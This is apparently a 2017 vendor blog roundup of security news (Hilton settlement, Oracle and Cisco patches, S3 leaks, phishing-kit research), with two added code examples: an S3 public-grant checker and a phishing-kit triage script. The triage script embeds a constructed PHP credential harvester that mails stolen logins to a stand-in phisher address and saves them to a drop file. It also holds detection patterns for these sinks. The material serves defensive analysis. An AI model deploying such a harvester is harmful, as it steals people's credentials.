Weekly InfoSec Roundup 11/03/17
November 3, 2017 by Syed Abdur

This week’s InfoSec news highlighted the importance of risk management in an ever-changing and fast-paced cyber security environment. Hilton settled with the Attorney General for $700,000, not only for the data breaches themselves but for leaving affected customers in the dark afterwards. Read on for more news and information on risk from this week.


  • How to focus C-Suite Attention on the Issue of Cybersecurity
  • “With large-scale cyber attacks becoming increasingly common, having an effective defence strategy in place has never been more important. A big challenge, however, is ensuring senior management fully understands the issue.”
    Read More

  • Oracle Fixes “Default Account” Issue Rated 10 Out of 10 on Severity Scale
  • “Oracle has released patches for a security issue affecting the Oracle Identity Manager that has received a rare 10 out of 10 score on the CVSSv3 bug severity scale. The giant software maker has remained tight-lipped about the issue and has not released any type of meaningful explanation in an attempt to delay the start of attacks trying to exploit this flaw as long as possible, giving customers more time to patch.”
    Read More

  • Hilton agrees to $700,000 settlement over data breaches
  • “On Tuesday, Attorney General Eric Schneiderman said that the Hilton Domestic Operating Company, formerly known as Hilton Worldwide, will pay $700,000 in recompense for failing in its duty — not simply by having poor security in the first place which allowed the data breaches to occur, but for then leaving customers in the dark.”
    Read More

  • Measuring cyber resilience – a rising tide raises all ships
  • “I admit it … I am one of the 143,000,000 people afflicted by the Equifax breach. For those of us who reside in the U.S., that number approaches 60% of all adults, based on recent numbers from the U.S. Census Bureau. Perhaps most unsettling is that failing to perform something as routine as a timely patch produced an event so catastrophic that it cost the CISO, CIO and CEO their jobs.”
    Read More

  • WannaCry, Cerber most used ransomware types, hospitals most hit sector, report
  • “WannaCry and Cerber have totally dominated the ransomware landscape so far this year, comprising almost all the attacks that have taken place, while other big names such as Locky were barely a blip on the radar.”
    Read More

  • Cisco patches 16 vulnerabilities to kick off November
  • “Cisco Systems on Wednesday issued patches and corresponding security alerts for 16 different product vulnerabilities, half of which are considered high impact in nature.”
    Read More

  • Another misconfigured Amazon S3 server leaks data of 50,000 Australian employees
  • “Another misconfigured Amazon server has resulted in the exposure of personal data – this time on 50,000 Australian employees that were left unsecure by a third-party contractor.”
    Read More
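The exposure above is the classic S3 misconfiguration: a bucket ACL that grants READ or WRITE to the AllUsers (everyone) or AuthenticatedUsers (any AWS account, not just your own) group, or a bucket policy whose Principal is "*". The following added example, which is not code from the original post or from any vendor, evaluates both documents offline and shows the weak configuration beside the corrected one. The ACL and policy dictionaries mirror the shape of boto3's get_bucket_acl() and get_bucket_policy() responses but are constructed here; the bucket name, account ID and role name in them are placeholders.

```python
"""Offline check of an S3 bucket ACL and bucket policy for public grants.

Added example. The ACL and policy documents mirror the shape of boto3's
get_bucket_acl() and get_bucket_policy() responses but are constructed here so
the check runs with no AWS credentials; bucket, account and role names are
placeholders.
"""
from __future__ import annotations

import json

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTHENTICATED_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
# AuthenticatedUsers means any AWS account in the world, not your organisation,
# so a grant to either group makes the bucket public.
PUBLIC_GROUPS = {ALL_USERS: "AllUsers", AUTHENTICATED_USERS: "AuthenticatedUsers"}


def acl_findings(acl: dict) -> list[str]:
    """Report every ACL grant to one of the public groups."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        uri = grantee.get("URI")
        if grantee.get("Type") == "Group" and uri in PUBLIC_GROUPS:
            findings.append(f"ACL grants {grant['Permission']} to {PUBLIC_GROUPS[uri]}")
    return findings


def _wildcard_principal(principal) -> bool:
    """True for Principal "*" or Principal {"AWS": "*"} (string or list form)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        return "*" in ([aws] if isinstance(aws, str) else aws)
    return False


def policy_findings(policy: dict) -> list[str]:
    """Report Allow statements whose principal is everyone."""
    findings = []
    statements = policy.get("Statement", [])
    statements = [statements] if isinstance(statements, dict) else statements
    for stmt in statements:
        if stmt.get("Effect") != "Allow" or not _wildcard_principal(stmt.get("Principal")):
            continue
        actions = stmt.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        # A Condition (source IP, VPC endpoint, ...) narrows the grant. Still report
        # it, but mark it so the reviewer can tell it from an unconditional leak.
        qualifier = " (conditional)" if "Condition" in stmt else ""
        findings.append(f"policy allows {','.join(actions)} to Principal *{qualifier}")
    return findings


def assess_bucket(acl: dict, policy_json: str | None) -> list[str]:
    """Combine ACL and policy findings; an empty list means nothing public was found."""
    findings = acl_findings(acl)
    if policy_json:
        findings += policy_findings(json.loads(policy_json))
    return findings


OWNER = {"Type": "CanonicalUser", "ID": "owner-canonical-id-placeholder"}

# The weak configuration: everyone can read, any AWS account can write, and the
# policy additionally makes every object fetchable by anyone.
LEAKY_ACL = {
    "Owner": {"ID": OWNER["ID"]},
    "Grants": [
        {"Grantee": OWNER, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
        {"Grantee": {"Type": "Group", "URI": AUTHENTICATED_USERS}, "Permission": "WRITE"},
    ],
}
LEAKY_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
        "Action": "s3:GetObject", "Resource": "arn:aws:s3:::hr-export-example/*",
    }],
})

# The corrected configuration: only the owner in the ACL, and the policy grants a
# single named role (placeholder account and role) rather than everyone.
FIXED_ACL = {"Owner": {"ID": OWNER["ID"]}, "Grants": [{"Grantee": OWNER, "Permission": "FULL_CONTROL"}]}
FIXED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "ContractorRead", "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::123456789012:role/HrContractorRead"},
        "Action": "s3:GetObject", "Resource": "arn:aws:s3:::hr-export-example/*",
    }],
})

if __name__ == "__main__":
    for label, acl, policy in (("leaky", LEAKY_ACL, LEAKY_POLICY), ("fixed", FIXED_ACL, FIXED_POLICY)):
        print(label, assess_bucket(acl, policy) or ["no public grants"])
```

To run this against real buckets, replace the sample dictionaries with the live get_bucket_acl() response and json.loads() of the Policy string from get_bucket_policy(); a bucket with no policy raises NoSuchBucketPolicy, which maps to passing None. Note that the third-party contractor case above is exactly where a named-principal policy, rather than a group grant, keeps the data scoped to one account.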

  • Just one day after its release, iOS 11.1 hacked by security researchers
  • “News of the exploits came from Trend Micro’s Mobile Pwn2Own contest in Tokyo, where security researchers found two vulnerabilities in Safari, the mobile operating system’s browser.”
    Read More

  • Silence Please: New Carbanak-Like Group Attacks Banks
  • “Researchers have uncovered a new advanced threat group which has targeted at least 10 financial institutions globally using tools and techniques similar to the notorious Carbanak group.”
    Read More

  • Cisco Patches Serious DoS, Injection Flaws in Several Products
    Read More

  • Analysis of 3,200 Phishing Kits Sheds Light on Attacker Tools and Techniques
  • “Phishing kits are used extensively by cybercriminals to increase the efficiency of stealing user credentials. The basic kit comprises an accurate clone of the target medium’s login page (Gmail, Facebook, Office 365, targeted banks, etc.), and a pre-written PHP script to steal the credentials — both bundled and distributed as a zip file. Successfully phished credentials are mailed by the script to the phisher, or gathered in a text file for later collection. This is commodity phishing; not spear-phishing.”
    Read More
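The description above is enough to build a static triage tool for such a kit: unpack the zip, find the PHP handler, and pull out the form fields it reads, the address it mails them to, the drop file it appends to, and the page it redirects the victim to afterwards. The following added example, which is not code from the original post or from the cited analysis, does that in Python; the sample kit it unpacks is constructed inline, and the e-mail address, file names and redirect URL in it are placeholders.

```python
"""Static triage of a commodity phishing kit distributed as a zip file.

Added example. Assumption (matching the article's description, not its code):
the kit holds a cloned login page plus a PHP handler that mails the submitted
credentials to the phisher and/or appends them to a text file, then redirects
the victim to the real site. The sample kit built below is constructed.
"""
import io
import re
import zipfile

# Patterns for the sources and sinks a commodity kit's PHP handler uses.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
MAIL_CALL_RE = re.compile(r"\bmail\s*\(")
DROP_FILE_RE = re.compile(r"\b(?:fopen|file_put_contents)\s*\(\s*['\"]([^'\"]+)['\"]")
REDIRECT_RE = re.compile(r"header\s*\(\s*['\"]Location:\s*([^'\"]+)['\"]")
FORM_FIELD_RE = re.compile(r"\$_(?:POST|REQUEST)\[\s*['\"]([A-Za-z0-9_]+)['\"]\s*\]")
PHP_EXTENSIONS = (".php", ".php5", ".phtml")

# Constructed sample kit: placeholder domains and addresses throughout.
SAMPLE_KIT_FILES = {
    "kit/index.html": (
        "<form method='post' action='post.php'>"
        "<input name='login'><input name='passwd' type='password'>"
        "<input type='submit'></form>"
    ),
    "kit/post.php": r"""<?php
$login  = $_POST['login'];
$passwd = $_POST['passwd'];
$ip     = $_SERVER['REMOTE_ADDR'];
$message = "Login: $login\nPassword: $passwd\nIP: $ip\n";
$to = "dropbox@phisher.example";            // where the credentials are mailed
mail($to, "New Rezult", $message);
$fp = fopen("rezult.txt", "a");              // and also kept for later pickup
fwrite($fp, $message);
fclose($fp);
header("Location: https://login.example.com/error");
?>""",
}


def build_sample_kit() -> bytes:
    """Pack the constructed sample files into a zip, as a kit would be shipped."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in SAMPLE_KIT_FILES.items():
            zf.writestr(name, body)
    return buf.getvalue()


def analyze_kit(zip_bytes: bytes) -> dict:
    """Scan every PHP file in the kit and collect what it harvests and where it goes."""
    findings = {
        "php_files": [],
        "harvested_fields": set(),   # form fields the handler reads
        "exfil_emails": set(),       # addresses appearing in the PHP source
        "drop_files": set(),         # local files the handler writes
        "redirects": set(),          # where the victim is sent afterwards
        "uses_mail": False,
    }
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(PHP_EXTENSIONS):
                continue
            src = zf.read(info).decode("utf-8", errors="replace")
            findings["php_files"].append(info.filename)
            findings["harvested_fields"].update(FORM_FIELD_RE.findall(src))
            findings["exfil_emails"].update(EMAIL_RE.findall(src))
            findings["drop_files"].update(DROP_FILE_RE.findall(src))
            findings["redirects"].update(REDIRECT_RE.findall(src))
            if MAIL_CALL_RE.search(src):
                findings["uses_mail"] = True
    # Sorted lists keep the output deterministic and easy to diff across kits.
    for key in ("harvested_fields", "exfil_emails", "drop_files", "redirects"):
        findings[key] = sorted(findings[key])
    return findings


def is_credential_harvester(findings: dict) -> bool:
    """A handler that reads form fields and has a sink (mail or file) is a harvester."""
    has_sink = findings["uses_mail"] or bool(findings["drop_files"])
    return bool(findings["harvested_fields"]) and has_sink


if __name__ == "__main__":
    result = analyze_kit(build_sample_kit())
    for key, value in result.items():
        print(f"{key}: {value}")
    print("credential harvester:", is_credential_harvester(result))
```

The harvested field names tell you which brand's login form was cloned, the drop file name is worth checking on any live host found serving the kit (the file is often readable in place), and the exfil address is the value to pivot on across other kits from the same operator.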

  • Shadow IT Growth Introducing Huge Compliance Risks: Report
  • “Shadow IT continues to grow, while senior management remains in denial. The average enterprise now uses 1,232 cloud apps (up 33% from the second half of last year), while CIOs still believe their organizations use between just 30 and 40 cloud apps and services. Within this cloud, 20% of all stored data is at risk from being ‘broadly shared’.”
    Read More

  • Hacker holds university for ransom, threatens to dump student info
  • “A hacker is trying to extort a Canadian university, threatening to dump student information unless university top brass pay 30,000 CAD (23,000 USD).”
    Read More

  • Cybersecurity Pros Can’t Keep Pace with Threat Landscape
  • “Most (54%) cybersecurity professionals believe the threat landscape is evolving faster than they can respond, with a lack of preparation and strategic thinking endemic, according to RedSeal.”
    Read More

  • Brinqa @ Cyber Security Summit Boston
  • Brinqa is a platinum sponsor at the upcoming Cyber Security Summit Boston on November 8, 2017. We will be available at booths #27 and #28 for product demos and discussions around cyber risk management. Syed Abdur, Director of Product Management, will be hosting a session on “Building a Comprehensive Cyber Risk Program through Effective Vulnerability Management”. If you’re a C-level exec in the Boston area, contact us at info@brinqa.wpengine.com for complimentary access to the event.
